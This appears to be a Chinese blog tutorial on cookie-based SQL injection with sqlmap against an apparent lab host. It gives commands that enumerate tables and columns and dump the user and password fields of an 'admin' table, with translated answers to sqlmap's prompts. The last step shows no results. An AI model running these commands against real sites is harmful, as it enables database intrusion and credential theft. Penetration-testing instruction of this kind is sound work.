sqlmap之(五)----Cookie注入实战

(1) cookie注入,猜解表

[html]  view plain  copy
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2  

do you want to URL encode cookie values (implementation specific)? [Y/n]

你想要对URL值进行URL编码(具体实现)吗?   输入"Y"

Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

cookie参数“id”是脆弱的。你想继续测试其他(如果有的话)吗?  输入"Y"

do you want to use common table existence check? [Y/n/q]

你是否要使用存在的公共表去检查? [Y/n/q]  输入"Y" 并输入线程数。

等待一下就出结果了。


(2) 猜解字段,(通过1的表猜解字段,假如表为admin)

[html]  view plain  copy
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --columns -T admin --level 2  


(3) 猜解内容

[html]  view plain  copy
  1. sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --dump -T admin -C "user,password" --level 2  


猜出的内容为

你可能感兴趣的:(sqlmap之(五)----Cookie注入实战)